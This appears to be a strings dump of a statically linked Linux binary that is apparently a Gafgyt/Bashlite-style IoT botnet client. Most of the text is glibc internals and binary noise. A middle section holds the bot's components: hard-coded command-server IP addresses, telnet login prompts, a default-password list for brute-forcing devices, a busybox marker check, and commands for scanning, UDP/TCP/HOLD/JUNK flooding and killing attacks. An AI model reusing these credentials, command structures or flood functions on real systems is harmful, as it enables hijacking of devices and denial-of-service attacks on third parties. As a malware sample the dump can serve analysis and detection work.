PTRh
ZY[^]
[[^_]
[^_]
[^_]
$GN9
[^_]
<?t+
fRRS
tEPCPS
WCWFSV
[^_]
u$Qj
[^_]
[^_]
v@us
[^_]
E@uB
/WWh
[^_]
Y^j S
[^_]
viPj
;E }
[^_]
3FPW
[^_]
*RRhk
t6QQ
[^_]
[^_]
Borrow or rob
PPj.S
[^_]
[^_]
:ru&
[^_]
[^_]
<su%
<du%
jaWQ
s<xu
jaWQ
<cu/
[^_]
QQRP
I<Xu	
<3u.
[^_]
WWPhL
u	QQh
WWhR2
}PPh
cQQh
IRRh	
/PPh
PPSV
PPSV
ZYPV
;} f
[^_]
RRSV
u	VVh
yESSh
QQSP
[^_]
uIPj
WWh)
QQh2
RRh2
j1h@
PPhy
<$VPh
j1h@
cRRh
[^_]
VVj	P
PPj,V
QQj,V
tARRh
VVh0
QQj,V
t>WVh4
tAVVh
RRhw
PPj,V
tAWVh{
;VVh
WVh{
RGRj	
t	PWh
[^_]
QQSh
[^_]
Do nine men interpret Nine men I nod
[^_]
WVSQ
_XVR
<[^_]
,[^_]
[^_]
[^_]
t!e3
gfff
gfff
[^_]
[^_]
<	vF
0[^_]
[^_]
[^_]
[^_]
H$[]
~hxX
[^_]
$[^_]
SH9z
 [^_]
([^_]
[^_]
[^_]
[^_]
WVStd
[^_]
$[^]
$[^]
[^_]
[^_]
9p0t/
 [^_]
[^_]
[^_]
[^_]
>AELDt
[^[^]
<[^_]
[^_]
[^_]
<[^_]
409u
409u
0[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
t\;H
[^_]
[^_]
[^_]
[^_]
P[^]
[^_]
[^_]
[^_]
[^_]
[^_]
AELD
H[^_]
sU9q0
[^_]
[^_]
[^_]
[^_]
$[^_]
[^_]
GuP1
u	AB
JsX1
Js>1
Js$1
@+D$
BBB9
Gu~1
GuL1
WVS1
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
u1WVS
[^_=
PWVS
[^_]
[^_]
out 
gfff
of m
emor
USVW
_^[]=
[^_=
.u]=
w>;]
([^_]
[^_]
[^_]
C<x'
[^_]
([^_]
tdta
tdtI
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
ntel
Genut'
ineIu
cAMDu
Authf
enti
t	[]
[^_]
[^_]
TRAN
SLIT
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
t7;E
/loc
ale.
aliaf
[^_]
[^_]
[^_]
[^_]
L[^_]
L[^_]
<@tB<_t^
[^_]
[^_]
[^_]
[^_]
X	tv
 [^_]
[^_]
\[^_]
[^_]
[^_]
[^_]
f;>u&
<7=t0
[^_]
[^_]
[^_]
<	vF
0[^_]
0[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
u!;{
[^_]
[^_]
t;kB$
47tY
47tY
uZk@$
F0[^_]
[^_]
[^_]
WVSQ
Y[^_]
[^_]
D$+)
L$+)
gfff
D$p1
l$t1
D$$tJ
D$`1
D$l1
D$tv?
D$l1
D$`1
|$t%
D$l+D$t9D$h
|$\}!
+D$ +D$h
t$l+t$t;t$h
Ot$h
t$h+t$l
t$ +t$`
T$<;
T$l+T$t
)D$\
)D$\
|$D9
D$D1
D$D1
D$D1
 <)w"
 <)v
[^_]
[^_]
[^_]
[^_]
[^_]
s,+s$
[^_]
[^_]
[^_]
R0+A
H []
[^_]
t	)x
$[^_]
|dtM
~99u
[^_]
|dtM
$[^]
$[^]
T$@!
T$0)
T$@+D$D
D$D9
;t$@
;\$<
T$0+D$D
[^_]
[^_]
D$\%
+G !
+D$D
G +G
9T$@| 
9D$<v
D$D)
9T$@
9D$<
+\$4
[^_]
H[^_]
H[^_]
H[^_]
0[^_]
[^_]
G +G
T$ )
CL#CP
K +K
y +y
[^_]
[^_]
[^_]
[^_]
[^_]
L$ !
T$ +D$
T$ 9U
[^_]
[^_]
9T$ |
9L$ 
D$4%
|$ )
9C tI
[^_]
[^_]
<_t-<-t)<.t%<,f
[^_]
C +C
xa9\$
D?d9
K +E
[^_]
[^_]
Gu[1
Gu#1
4[^_
oL$ f
oL$ f
D$ u]f
oL$ f
oD$ f
oL$ f
tL$ f
t0@Nt
t(@Nt
[^_]
[^_]
[^_]
[^_]
	e35
[^_]
[^_]
[^_]
	e35
[^_]
[^_]
t~9P
t7s~
[^_]
gfff
[^_]
[^_]
<,u>
<Mtp
C$+E
[^_]
 [^_]
 [^_]
[^_]
2333
$[^_]
$[^_]
[^_]
<0t1
t ;U
48t2
gfff
<0t,
[^_]
 [^_]
[^_]
|:t|
[^_]
/POS
IX_Vf
[^_]
USVW
_^[]=
_^[]
[^_]
[^_]
[^_]
,[^_]
[^_]
uu9U
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
tj9X
[^_]
[^_]
[^_]
[^_]
<.t%;M
<.t*
[^_]
[^_]
[^_]
[^_]
[^_]
@bQs
[^_]
[^_]
<$tS
[^_]
<:t	
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
D[^_]
[^_]
[^_]
;^ ug
l[^_]
[^_]
[^_]
[^_]
[^_]
 [^_]
[^_]
@bQs
St	k
[^_]
[^_]
[^_]
,[^_]
[^_]
[^_]
[^_]
UPQR
i\80
[^_]
	e3=
4[^_]
[^_]
	e35
[^_]
	e35
[^_]
8/tS
[^_]
;1s$
[^_]
[^_]
[^_]
ts|y
[^_]
[^_]
[^_]
/usr
/lib
32/g
conv
;/t'
/usr
/lib
32/g
conv
Degas are we not drawn onward no In union drawn onward to new eras aged
gcon
v-mo
dulef
[^_]
[^_]
\[^_]
P[^_]
	e3=
tF9]
h[^_]
t"9]
[^_]
[^_]
L[^_]
L[^_]
\[^_]
	e35
L[^_]
L[^_]
<[^_]
<[^_]
@[^_]
C$tD
[^_]
X[^_]
[^_]
X[^_]
[^_]
[^_]
	e35
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
/SYS
[^_]
[^_]
k@$l
[^_]
[^_]
H[^_]
w	;E
H[^_]
H[^_]
Jt.P
X[^_
Bt(P
X[^_
[^_]
[^_]
WVUS
[]^_
[^_]
([^_]
([^_]
[^_]
,[^_]
,[^_]
R Iu
WVUS
[]^_
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
43tI
47tT
[^_]
 [^_]
C,x0
[^_]
tr;E
[^_]
[^_]
B$;B(
	e35
([^_]
	e35
	e35
([^_]
	e3=
s,+s$
VSt)
[^_]
[^_]
[^_]
[^_]
VUUU
$[^_]
$[^_]
$[^_]
[^_]
	e3=
	e3=
[^_]
[^_]
[^_]
u";u
[^_]
[^_]
u7;C
[^_]
$[^_]
[^_]
[^_]
[^_]
seco
.pro
file
[^_]
R Iu
WVUS
[]^_
WVSQ
Y[^_]
u:9u
[^_]
[^_]
[^_]
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQj
	e3=
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
D$<9D$D
<	vE
\$L9\$@
9T$Du
T$ f
nD$Lf
L$<;L$ 
|$(1
;T$P
t$(e
T[^_]
;D$L
T[^_]
nD$L
T$ f
D$L3\$03D$$
alula
L$ 	
;T$D
<	vN
T$ f
T$ tg
\$P9\$0r%w
L$L9L$$r
9L$,
D$K1
|$K	v
T$@9T$L
T$H1
T$8f
;T$H
}%9|$P
9L$L
D$@9
[^_]
[^_]
T$[1
D$T3D$4
D$P3D$(	D$8
;L$L
;D$H
\$T9\$4r%w
t$P9t$(r
9D$0
L$@1
;D$Hr
9D$Hf
D$[1
|$[	v
;D$Hr
[^_]
 [^_]
<	vR
[^_]
[^_]
80u?
so+}
VUUU+M
[^_]
 [^_]
L$T1
<	vX
D$X<`
L$T1
|$\e
L$\9
t$Dt@
L$\1
\$D<0
9D$T
t$X9t$\
T$\9T$Xu
T$Pf
8L$T
:L$Pt	
ED$D
T$4)
)L$\
D$\+D$X9
L$X)
|$\+|$X
|$\~
t$L)
L$Xu
t$ 9t$X
9T$H
;D$X
)|$$+D$X9L$$w
|$L;
|$H;
\$H)
\$Xu
L$(+D$8
[^_]
[^_]
9t$\
[^_]
D$P<p
9D$\
|$D9|$T
t$Hu
|$T5
|$X9|$\
|$T)
L$\	
80uH
D$D+D$X
9\$X
D$T 
|$T5
t$P+D$T
D$8t
+L$8
D$D+D$X
\$T1
+t$T
D$T 
|$T5
+D$\
t$P1
L$0+D$L
D$T 
+|$\1
|$T5
+D$T
D$Lt
+L$L
VUUU+|$T
|$H9|$L~V
D$@ 
t$D)T$@
9|$L
t$D+T$H
|$\p
D$T)
|$T5
D$85
)D$8
+T$T
+D$T
|$X1
L$\8
T$\:
0<	v
[^_]
 [^_]
D$Hf
L$l1
<	vX
D$d<`
L$l1
|$pe
L$p9
D$Xt@
L$p1
9D$l
\$d9\$p
T$p9T$du
8L$l
8L$l
:L$ht
ED$X
T$H)
)|$p
D$p+D$d9
L$d)
|$p+|$l
|$p~
\$`)
L$lu
\$49\$l
9T$\
T$@9
;D$l
)|$8+D$l9\$8w
|$`;
|$\;
t$\)
\$lu
L$<+D$P
9\$p
L$,9D$p
;T$X
\$\u
|$d@
D$l9D$p
|$h)
L$p	
80uH
D$X+D$d
9t$l
|$d 
D$d 
|$d@
+D$d
D$Pt
+L$P
D$X+D$d
|$d 
D$d 
|$d@
T$\9
+D$p
L$D+D$`
|$d 
D$d 
+L$p
|$d@
+D$d
D$`t
+L$`
+t$d
T$0)
9D$`
D$P 
)|$P
9T$`
+T$d
|$pp
|$\)
|$d@
D$P@
)D$P
|$l1
+D$d
T$p:
0<	v
t@9}
[^_]
[^_]
[^_]
[^_]
<[^_]
,[^_]
\[^_]
t)9R
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
@c@t
[^_]
Fc@u
L[^_]
L[^_]
[^_]
Ac@t
tLv*<#
Bc@t
[^_]
Bc@t
Bc@t
Bc@t
[^_]
[^_]
[^_]
[^_]
[^_]
VH;W
[^_]
WVSRP
0^_]
 ^_]
 t*~
x	zt
[^_]
,[^_]
@^_]
@^_]
 ^_]
 ^_]
 t*~
[^_]
|[^_]
[^_]
L[^_]
>;:v
[^_]
t"9~
98tY
[^_]
\[^_]
[^_]
[^_]
WVS1
[^_]
9_<v0
[^_]
[^_]
	e35
[^_]
[^_]
tY=D
[^_]
L9=@
[^_]
L95@
108.162.197.26
Eleele
/proc/net/route
	00000000	
/proc/cpuinfo
BOGOMIPS
/bin/sh
(null)
%d.%d.%d.%d
%d.%d.%d.0
buf: %s
Failed opening raw socket.
Failed setting raw headers mode.
Invalid flag "%s"
ogin:
assword:
ncorrect
/bin/busybox;echo -e '\147\141\171\146\147\164'
gayfgt
multi-call
REPORT %s:%s:%s
REPORT %s:%s:
PING
PONG!
GETLOCALIP
My IP: %s
SCANNER
SCANNER ON | OFF
HOLD
HOLD Flooding %s:%d for %d seconds.
A Santa lives evil at NASA
JUNK
JUNK Flooding %s:%d for %d seconds.
UDP Flooding %s for %d seconds.
UDP Flooding %s:%d for %d seconds.
TCP Flooding %s for %d seconds.
KILLATTK
Killed %d.
None Killed.
LOLNOGTFO
recv: %s
MAC: %02X:%02X:%02X:%02X:%02X:%02X
Failed to connect...
BUILD %s
PONG
%s 2>&1
Link closed by server.
89.238.150.154:5
:>%$#
root
admin
user
login
guest
toor
changeme
1234
12345
123456
default
pass
password
FATAL: kernel too old
/dev/urandom
FATAL: cannot determine kernel version
/dev/null
/dev/full
set_thread_area failed when setting up thread-local storage
unexpected reloc type in static binary
cxa_atexit.c
l != ((void *)0)
__new_exitfn
UUUU
?3333
	^B{	I
LIBC_FATAL_STDERR_
/dev/tty
======= Backtrace: =========
======= Memory map: ========
/proc/self/maps
<unknown>
malloc: top chunk is corrupt
corrupted double-linked list
malloc.c
TOP_PAD_
PERTURB_
MMAP_MAX_
TRIM_THRESHOLD_
MMAP_THRESHOLD_
hooks.c
ms->av[2*i+3] == 0
((p)->size & 0x2)
ret == 0
free(): invalid pointer
free(): invalid size
heap->ar_ptr == av
arena.c
p->size == (0|0x1)
malloc(): memory corruption
(bck->bk->size & 0x4) == 0
(fwd->size & 0x4) == 0
bit != 0
!(((av)->flags & (1U)) == 0)
correction >= 0
<heap nr="%d">
<sizes>
</heap>
<malloc version="1">
nclears >= 3
Arena %d:
system bytes     = %10u
in use bytes     = %10u
Total (incl. mmap):
max mmap regions = %10u
max mmap bytes   = %10lu
realloc(): invalid old size
realloc(): invalid next size
!((oldp)->size & 0x2)
ncopies >= 3
(p->prev_size == offset)
realloc(): invalid pointer
malloc_consolidate
munmap_chunk
_int_free
heap_trim
_int_malloc
sYSMALLOc
mTRIm
__libc_calloc
__libc_pvalloc
_int_memalign
__libc_valloc
__libc_memalign
__libc_realloc
mremap_chunk
_int_realloc
__libc_malloc
__malloc_set_state
*** glibc detected *** %s: %s: 0x%s ***
%s%s%s:%u: %s%sAssertion `%s' failed.
p->fd_nextsize->bk_nextsize == p
p->bk_nextsize->fd_nextsize == p
nextchunk->fd_nextsize->bk_nextsize == nextchunk
nextchunk->bk_nextsize->fd_nextsize == nextchunk
munmap_chunk(): invalid pointer
free(): invalid next size (fast)
free(): invalid next size (normal)
double free or corruption (fasttop)
double free or corruption (top)
double free or corruption (out)
double free or corruption (!prev)
free(): corrupted unsorted chunks
new_size>0 && new_size<(long)(2*(unsigned long)((((__builtin_offsetof (struct malloc_chunk, fd_nextsize))+((2 * (sizeof(size_t))) - 1)) & ~((2 * (sizeof(size_t))) - 1))))
new_size>0 && new_size<(2 * (512 * 1024))
((unsigned long)((char*)p + new_size) & (pagesz-1)) == 0
((char*)p + new_size) == ((char*)heap + heap->size)
(char *) ((void*)((char*)(p) + 2*(sizeof(size_t)))) + 4 * (sizeof(size_t)) <= paligned_mem
(char *) p + size > paligned_mem
God A red nugget A fat egg under a dog
malloc(): memory corruption (fast)
malloc(): smallbin double linked list corrupted
victim->fd_nextsize->bk_nextsize == victim
victim->bk_nextsize->fd_nextsize == victim
malloc(): corrupted unsorted chunks
(unsigned long)(size) >= (unsigned long)(nb)
malloc(): corrupted unsorted chunks 2
((unsigned long)(nb) < (unsigned long)(64 * (2 * (sizeof(size_t)))))
((size_t)((void*)((char*)(mm) + 2*(sizeof(size_t)))) & ((2 * (sizeof(size_t))) - 1)) == 0
(old_top == (((mbinptr) (((char *) &((av)->bins[((1) - 1) * 2])) - __builtin_offsetof (struct malloc_chunk, fd)))) && old_size == 0) || ((unsigned long) (old_size) >= (unsigned long)((((__builtin_offsetof (struct malloc_chunk, fd_nextsize))+((2 * (sizeof(size_t))) - 1)) & ~((2 * (sizeof(size_t))) - 1))) && ((old_top)->size & 0x1) && ((unsigned long)old_end & pagemask) == 0)
(unsigned long)(old_size) < (unsigned long)(nb + (unsigned long)((((__builtin_offsetof (struct malloc_chunk, fd_nextsize))+((2 * (sizeof(size_t))) - 1)) & ~((2 * (sizeof(size_t))) - 1))))
break adjusted to free malloc space
((unsigned long)((void*)((char*)(brk) + 2*(sizeof(size_t)))) & ((2 * (sizeof(size_t))) - 1)) == 0
newsize >= nb && (((unsigned long)(((void*)((char*)(p) + 2*(sizeof(size_t)))))) % alignment) == 0
<size from="%zu" to="%zu" total="%zu" count="%zu"/>
<unsorted from="%zu" to="%zu" total="%zu" count="%zu"/>
</sizes>
<total type="fast" count="%zu" size="%zu"/>
<total type="rest" count="%zu" size="%zu"/>
<system type="current" size="%zu"/>
<system type="max" size="%zu"/>
<aspace type="total" size="%zu"/>
<aspace type="mprotect" size="%zu"/>
<total type="fast" count="%zu" size="%zu"/>
<total type="rest" count="%zu" size="%zu"/>
<system type="current" size="%zu"/>
<system type="max" size="%zu"/>
<aspace type="total" size="%zu"/>
<aspace type="mprotect" size="%zu"/>
</malloc>
!mem || ((((mchunkptr)((char*)(mem) - 2*(sizeof(size_t)))))->size & 0x2) || av == (((((mchunkptr)((char*)(mem) - 2*(sizeof(size_t)))))->size & 0x4) ? ((heap_info *)((unsigned long)(((mchunkptr)((char*)(mem) - 2*(sizeof(size_t))))) & ~((2 * (512 * 1024))-1)))->ar_ptr : &main_arena)
!p || ((((mchunkptr)((char*)(p) - 2*(sizeof(size_t)))))->size & 0x2) || ar_ptr == (((((mchunkptr)((char*)(p) - 2*(sizeof(size_t)))))->size & 0x4) ? ((heap_info *)((unsigned long)(((mchunkptr)((char*)(p) - 2*(sizeof(size_t))))) & ~((2 * (512 * 1024))-1)))->ar_ptr : &main_arena)
!victim || ((((mchunkptr)((char*)(victim) - 2*(sizeof(size_t)))))->size & 0x2) || ar_ptr == (((((mchunkptr)((char*)(victim) - 2*(sizeof(size_t)))))->size & 0x4) ? ((heap_info *)((unsigned long)(((mchunkptr)((char*)(victim) - 2*(sizeof(size_t))))) & ~((2 * (512 * 1024))-1)))->ar_ptr : &main_arena)
next->fd_nextsize->bk_nextsize == next
next->bk_nextsize->fd_nextsize == next
(unsigned long)(newsize) >= (unsigned long)(nb)
((size + offset) & (mp_.pagesize-1)) == 0
(((unsigned long)(((void*)((char*)(p) + 2*(sizeof(size_t))))) & ((2 * (sizeof(size_t))) - 1)) == 0)
!newp || ((((mchunkptr)((char*)(newp) - 2*(sizeof(size_t)))))->size & 0x2) || ar_ptr == (((((mchunkptr)((char*)(newp) - 2*(sizeof(size_t)))))->size & 0x4) ? ((heap_info *)((unsigned long)(((mchunkptr)((char*)(newp) - 2*(sizeof(size_t))))) & ~((2 * (512 * 1024))-1)))->ar_ptr : &main_arena)
../nptl/sysdeps/unix/sysv/linux/i386/../fork.c
({ __typeof (self->tid) __value; if (sizeof (__value) == 1) asm volatile ("movb %%gs:%P2,%b0" : "=q" (__value) : "0" (0), "i" (__builtin_offsetof (struct pthread, tid))); else if (sizeof (__value) == 4) asm volatile ("movl %%gs:%P1,%0" : "=r" (__value) : "i" (__builtin_offsetof (struct pthread, tid))); else { if (sizeof (__value) != 8) abort (); asm volatile ("movl %%gs:%P1,%%eax\n\t" "movl %%gs:%P2,%%edx" : "=A" (__value) : "i" (__builtin_offsetof (struct pthread, tid)), "i" (__builtin_offsetof (struct pthread, tid) + 4)); } __value; }) != ppid
({ __typeof (({ struct pthread *__self; asm ("movl %%gs:%c1,%0" : "=r" (__self) : "i" (__builtin_offsetof (struct pthread, header.self))); __self;})->tid) __value; if (sizeof (__value) == 1) asm volatile ("movb %%gs:%P2,%b0" : "=q" (__value) : "0" (0), "i" (__builtin_offsetof (struct pthread, tid))); else if (sizeof (__value) == 4) asm volatile ("movl %%gs:%P1,%0" : "=r" (__value) : "i" (__builtin_offsetof (struct pthread, tid))); else { if (sizeof (__value) != 8) abort (); asm volatile ("movl %%gs:%P1,%%eax\n\t" "movl %%gs:%P2,%%edx" : "=A" (__value) : "i" (__builtin_offsetof (struct pthread, tid)), "i" (__builtin_offsetof (struct pthread, tid) + 4)); } __value; }) == ppid
__libc_fork
/dev/log
<%d>
%h %e %T 
[%d]
/dev/console
syslog: unknown facility/priority: %x
0123456789abcdef
/var/tmp
/var/profile
apic
mtrr
Beeb
cmov
pse36
clflush
acpi
fxsr
sse2
ia64
i386
i486
i586
i686
GCONV_PATH
GETCONF_DIR
HOSTALIASES
LD_AUDIT
LD_DEBUG
LD_DEBUG_OUTPUT
LD_DYNAMIC_WEAK
LD_LIBRARY_PATH
LD_ORIGIN_PATH
LD_PRELOAD
LD_PROFILE
LD_SHOW_AUXV
LD_USE_LOAD_BIAS
LOCALDOMAIN
LOCPATH
MALLOC_TRACE
NIS_PATH
NLSPATH
RESOLV_HOST_CONF
RES_OPTIONS
TMPDIR
TZDIR
LD_AOUT_LIBRARY_PATH
LD_AOUT_PRELOAD
LD_WARN
LD_LIBRARY_PATH
LD_BIND_NOW
LD_BIND_NOT
LD_DYNAMIC_WEAK
LD_PROFILE_OUTPUT
/etc/suid-debug
MALLOC_CHECK_
LD_ASSUME_KERNEL
/proc/sys/kernel/osrelease
^[yY]
^[nN]
%p%t%g%t%m%t%f
%a%N%f%N%d%N%b%N%s %h %e %r%N%C-%z %T%N%c%N
+%c %a %l
ISO/IEC 14652 i18n FDCC-set
Keld Simonsen
keld@dkuug.dk
+45 3122-6543
+45 3325-6543
1997-12-20
ISO/IEC JTC1/SC22/WG20 - internationalization
C/o Keld Simonsen, Skt. Jorgens Alle 8, DK-1615 Kobenhavn V
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
i18n:1999
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Unexpected error.
OUTPUT_CHARSET
charset=
LANGUAGE
POSIX
messages
/usr/share/locale
plural=
nplurals=
{fG5
0123456789abcdefghijklmnopqrstuvwxyz
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZto_outpunct
vfprintf.c
(nil)
((&mbstate)->__count == 0)
s->_flags2 & 4
_IO_vfprintf_internal
(unsigned int) done < (unsigned int) 2147483647
(size_t) done <= (size_t) 2147483647
*** %n in writable segment detected ***
*** invalid %N$ use detected ***
../stdio-common/printf_fphex.c
*decimal != '\0' && decimalwc != L'\0'
__printf_fphex
fxprintf.c
(((fmt[i]) & ~0x7f) == 0)
__fxprintf
                0000000000000000
wfileops.c
status == __codecvt_partial
_IO_wfile_underflow
,ccs=
fcts.towc_nsteps == 1
fcts.tomb_nsteps == 1
_IO_new_file_fopen
strops.c
offset >= oldend
enlarge_userbuf
Unknown error 
wcrtomb.c
__wcrtomb
status == __GCONV_OK || status == __GCONV_EMPTY_INPUT || status == __GCONV_ILLEGAL_INPUT || status == __GCONV_INCOMPLETE_INPUT || status == __GCONV_FULL_OUTPUT
wcsrtombs.c
data.__outbuf[-1] == '\0'
__wcsrtombs
data.__outbuf != (unsigned char *) dst
((data.__statep)->__count == 0)
mbsnrtowcs.c
result > 0
__mbsnrtowcs
ANSI_X3.4-1968//TRANSLIT
%[A-Za-z]%n
%hu%n:%hu%n:%hu%n
M%hu.%hu.%hu%n
/etc/localtime
Universal
tzfile.c
num_types == 2
num_types == 1
TZDIR
TZif
posixrules
__tzfile_compute
__tzfile_read
/usr/share/zoneinfo
__extension__ ({ size_t __s1_len, __s2_len; (__builtin_constant_p (&zone_names[info->idx]) && __builtin_constant_p (__tzname[tp->tm_isdst]) && (__s1_len = __builtin_strlen (&zone_names[info->idx]), __s2_len = __builtin_strlen (__tzname[tp->tm_isdst]), (!((size_t)(const void *)((&zone_names[info->idx]) + 1) - (size_t)(const void *)(&zone_names[info->idx]) == 1) || __s1_len >= 4) && (!((size_t)(const void *)((__tzname[tp->tm_isdst]) + 1) - (size_t)(const void *)(__tzname[tp->tm_isdst]) == 1) || __s2_len >= 4)) ? __builtin_strcmp (&zone_names[info->idx], __tzname[tp->tm_isdst]) : (__builtin_constant_p (&zone_names[info->idx]) && ((size_t)(const void *)((&zone_names[info->idx]) + 1) - (size_t)(const void *)(&zone_names[info->idx]) == 1) && (__s1_len = __builtin_strlen (&zone_names[info->idx]), __s1_len < 4) ? (__builtin_constant_p (__tzname[tp->tm_isdst]) && ((size_t)(const void *)((__tzname[tp->tm_isdst]) + 1) - (size_t)(const void *)(__tzname[tp->tm_isdst]) == 1) ? __builtin_strcmp (&zone_names[info->idx], __tzname[tp->tm_isdst]) : (__extension__ ({ __const unsigned char *__s2 = (__const unsigned char *) (__const char *) (__tzname[tp->tm_isdst]); register int __result = (((__const unsigned char *) (__const char *) (&zone_names[info->idx]))[0] - __s2[0]); if (__s1_len > 0 && __result == 0) { __result = (((__const unsigned char *) (__const char *) (&zone_names[info->idx]))[1] - __s2[1]); if (__s1_len > 1 && __result == 0) { __result = (((__const unsigned char *) (__const char *) (&zone_names[info->idx]))[2] - __s2[2]); if (__s1_len > 2 && __result == 0) __result = (((__const unsigned char *) (__const char *) (&zone_names[info->idx]))[3] - __s2[3]); } } __result; }))) : (__builtin_constant_p (__tzname[tp->tm_isdst]) && ((size_t)(const void *)((__tzname[tp->tm_isdst]) + 1) - (size_t)(const void *)(__tzname[tp->tm_isdst]) == 1) && (__s2_len = __builtin_strlen (__tzname[tp->tm_isdst]), __s2_len < 4) ? (__builtin_constant_p (&zone_names[info->idx]) && ((size_t)(const void *)((&zone_names[info->idx]) + 1) - (size_t)(const void *)(&zone_names[info->idx]) == 1) ? __builtin_strcmp (&zone_names[info->idx], __tzname[tp->tm_isdst]) : (__extension__ ({ __const unsigned char *__s1 = (__const unsigned char *) (__const char *) (&zone_names[info->idx]); register int __result = __s1[0] - ((__const unsigned char *) (__const char *) (__tzname[tp->tm_isdst]))[0]; if (__s2_len > 0 && __result == 0) { __result = (__s1[1] - ((__const unsigned char *) (__const char *) (__tzname[tp->tm_isdst]))[1]); if (__s2_len > 1 && __result == 0) { __result = (__s1[2] - ((__const unsigned char *) (__const char *) (__tzname[tp->tm_isdst]))[2]); if (__s2_len > 2 && __result == 0) __result = (__s1[3] - ((__const unsigned char *) (__const char *) (__tzname[tp->tm_isdst]))[3]); } } __result; }))) : __builtin_strcmp (&zone_names[info->idx], __tzname[tp->tm_isdst])))); }) == 0
%H:%M:%S
%H:%M
%m/%d/%y
%Y-%m-%d
%I:%M:%S %p
GETCONF_DIR
/usr/lib/getconf
/proc/sys/kernel/ngroups_max
LP64_OFF64
LPBIG_OFFBIG
/proc/sys/kernel/rtsig-max
../sysdeps/unix/sysv/linux/getcwd.c
__libc_errno != 34 || buf != ((void *)0) || size != 0
__getcwd
/proc/meminfo
MemFree: %ld kB
MemTotal: %ld kB
*cp <= *re
/proc/stat
processor
/sys/devices/system/cpu
next_line
../sysdeps/unix/sysv/linux/getsysstats.c
ORIGIN
PLATFORM
cannot allocate name record
dl-load.c
lastp != ((void *)0)
 search path=
		(%s from file %s)
		(%s)
cannot read file data
file too short
invalid ELF header
ELF file OS ABI invalid
internal error
ELF file ABI version invalid
  trying file=%s
cannot stat shared object
r->r_state == RT_ADD
cannot map zero-fill pages
dynamic-link.h
cannot close file descriptor
system search path
pelem->dirname[0] == '/'
lib32
(l)->l_name[0] == '\0' || 0
nsid >= 0
nsid < _dl_nns
RPATH
RUNPATH
wrong ELF class: ELFCLASS64
expand_dynamic_string_token
_dl_map_object
add_name_to_object
_dl_map_object_from_fd
elf_get_dynamic_info
_dl_init_paths
cannot create cache for search path
ELF file data encoding not little-endian
ELF file version ident does not match current one
ELF file version does not match current one
only ET_DYN and ET_EXEC can be loaded
ELF file's phentsize not the expected size
file=%s [%lu];  generating link map
cannot create shared object descriptor
ELF load command address/offset not properly aligned
cannot dynamically load executable
cannot change memory protections
ELF load command alignment not page-aligned
cannot allocate TLS data structures for initial thread
object file has no loadable segments
failed to map segment from shared object
object file has no dynamic section
info[20]->d_un.d_val == 17 || info[20]->d_un.d_val == 7
info[9]->d_un.d_val == sizeof (Elf32_Rela)
info[19]->d_un.d_val == sizeof (Elf32_Rel)
shared object cannot be dlopen()ed
cannot allocate memory for program header
cannot enable executable stack as shared object requires
  dynamic: 0x%0*lx  base: 0x%0*lx   size: 0x%0*Zx
    entry: 0x%0*lx  phdr: 0x%0*lx  phnum:   %*u
cannot create search path array
cannot create RUNPATH/RPATH copy
file=%s [%lu];  needed by %s [%lu]
find library=%s [%lu]; searching
cannot open shared object file
/lib32/
/usr/lib32/
/lib/i486-linux-gnu/
/usr/lib/i486-linux-gnu/
/etc/ld.so.cache
 search cache=%s
ld.so-1.7.0
glibc-ld.so.cache1.1
dl-cache.c
cache != ((void *)0)
/etc/ld.so.nohwcap
_dl_load_cache_lookup
dl-lookup.c
out of memory
version != ((void *)0)
 (no version symbols)
symbol 
, version 
 not defined in file 
 with link time reference
<main program>
relocation error
symbol lookup error
normal
protected
 [%s]
_dl_setup_hash
undefined symbol: 
_dl_lookup_symbol_x
check_match
(bitmask_nwords & (bitmask_nwords - 1)) == 0
version->filename == ((void *)0) || ! _dl_name_match_p (version->filename, map)
symbol=%s;  lookup in file=%s [%lu]
version == ((void *)0) || (flags & ~(DL_LOOKUP_ADD_DEPENDENCY | DL_LOOKUP_GSCOPE_LOCK)) == 0
file=%s [%lu];  needed by %s [%lu] (relocation dependency)
binding file %s [%lu] to %s [%lu]: %s symbol `%s'
cannot allocate memory in static TLS block
cannot make segment writable for relocation
%s: Symbol `%s' has different size in shared object, consider re-linking
%s: no PLTREL found in object %s
%s: out of memory to store relocation results for %s
cannot restore segment prot after reloc
map->l_tls_modid <= dtv[-1].counter
 (lazy)
relocation processing: %s%s
<program name unknown>
../sysdeps/i386/dl-machine.h
((reloc->r_info) & 0xff) == 8
dl-reloc.c
elf_machine_rel_relative
_dl_nothread_init_static_tls
unexpected reloc type 0x
unexpected PLT reloc type 0x
cannot apply additional memory protection after relocation
DYNAMIC LINKER BUG!!!
%s: %s: %s%s%s%s%s
fatal
continued
%s: error: %s: %s (%s)
out of memory
error while loading shared libraries
dl-misc.c
niov < 64
! "invalid format specifier"
_dl_debug_vdprintf
pid >= 0 && sizeof (pid_t) <= 4
dl-tls.c
idx == 0
dlopen
map->l_tls_modid == cnt
listp != ((void *)0)
_dl_add_to_slotinfo
_dl_allocate_tls_init
_dl_next_tls_modid
cannot create TLS data structures
result <= _dl_tls_max_dtv_idx + 1
result == _dl_tls_max_dtv_idx + 1
map->l_tls_blocksize >= map->l_tls_initimage_size
(size_t) map->l_tls_offset >= map->l_tls_blocksize
/proc/self/exe
linkval[0] == '/'
_dl_get_origin
../sysdeps/unix/sysv/linux/dl-origin.c
IGNORE
gconv.c
